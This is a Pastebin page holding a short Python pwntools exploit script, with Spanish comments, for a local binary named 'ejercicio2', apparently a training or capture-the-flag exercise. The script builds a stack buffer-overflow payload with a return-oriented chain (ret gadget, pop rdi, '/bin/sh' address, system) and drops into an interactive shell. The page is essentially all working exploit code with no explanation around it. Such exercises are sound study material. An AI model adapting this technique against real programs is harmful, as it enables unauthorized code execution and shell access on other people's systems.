Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/usr/bin/python3
- from pwn import *
- fileName = "./ejercicio2"
- e = ELF(fileName) #Checksec ejercicio2
- p = process(fileName)
- ret = 0x40101a
- poprdi = 0x401343
- binsh = 0x404058
- system=0x4010a0
- win = 0x4011d6
- payload = b'12341234' # Ingreso ping valido para que no se caiga el binario
- payload += b'A' * 32 # igual a \x41
- #payload += b'B' * 8 #igual a \x42
- payload += p64(ret)
- payload += p64(poprdi)
- payload += p64(binsh)
- payload += p64(system)
- #payload += p64(e.sym.win)
- #print(hex(e.sym.win))
- #payload += b'C' * 128 #igual a \x42
- print (payload)
- print(p.recvuntil(b"almacenar"))
- p.sendline(payload)
- print(p.recvuntil(b"preferirnos"))
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
